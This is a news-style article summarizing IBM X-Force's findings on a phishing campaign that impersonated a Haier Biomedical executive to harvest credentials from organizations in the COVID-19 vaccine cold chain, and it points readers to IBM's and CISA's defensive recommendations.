IBM Security (the company’s cybersecurity division) has recently discovered a global phishing campaign targeting organizations associated with the critical coronavirus vaccine distribution chain. The division’s “X-Force,” created at the onset of the pandemic to monitor cyber threats against vaccine developers and distributors, released a report on Thursday with their analysis and recommendations.

Starting in September, and spanning across at least 6 countries and multiple organizations, the malicious cyber operation appeared to specifically target the Cold Chain Equipment Optimization Platform (CCEOP), a $400M, 5-year project launched in 2015 by Gavi the Vaccine Alliance, UNICEF, and other partners. CCEOP was initiated to upgrade existing cold chain equipment in 56 countries by 2021, and has been specifically utilized this year to support vaccine response efforts for COVID-19. As vaccines are both light- and heat-sensitive, the newly developed technology has been absolutely vital in preserving vaccine quality and potency during storage and transportation.

The nature of the cyberattacks involved impersonation of a business executive from Haier Biomedical, a legitimate CCEOP supplier and purportedly the world’s only complete cold chain provider. Disguised as this business leader, the cyber-attacker sent phishing emails to organizations that support the CCEOP project efforts, including those in the energy sector (e.g., companies who develop solar-powered vaccine refrigerators and dry ice through petroleum production) and the IT sector (e.g., organizations involved in safeguarding pharmaceutical manufacturing and the biotechnical and electrical components of container transportation). The emails were posed as requests for quotations for participating in a vaccine program, but included malicious HTML attachments which prompted the recipient to enter their personal credentials. IBM believes that the purpose of harvesting the credentials is possibly to steal the cold chain technology, or more likely, to gain unauthorized access to critical and confidential information pertaining to the COVID-19 vaccine distribution, including timelines, lists of recipients, and shipping routes, for a more nefarious objective. IBM has not yet identified the cyber-attacker(s), but because of the sophisticated and precision-targeted attacks, it is believed to be the work of a nation-state, rather than a rogue criminal operation.

While it is currently unclear whether the phishing attacks were successful, governments are already sounding the alarm and alerting those organizations involved in developing, manufacturing, and distributing the COVID-19 vaccine to the threat of cyberattacks. The thought of an intentional interference with the vaccine’s cold chain distribution is chilling, and companies involved are strongly encouraged to review the recommendations and indicators of compromise set forth in IBM’s report, as well as the U.S. Cybersecurity & Infrastructure Security Agency’s (CISA) tips for avoiding phishing attacks in its CISA Insights: Enhance Email & Web Security.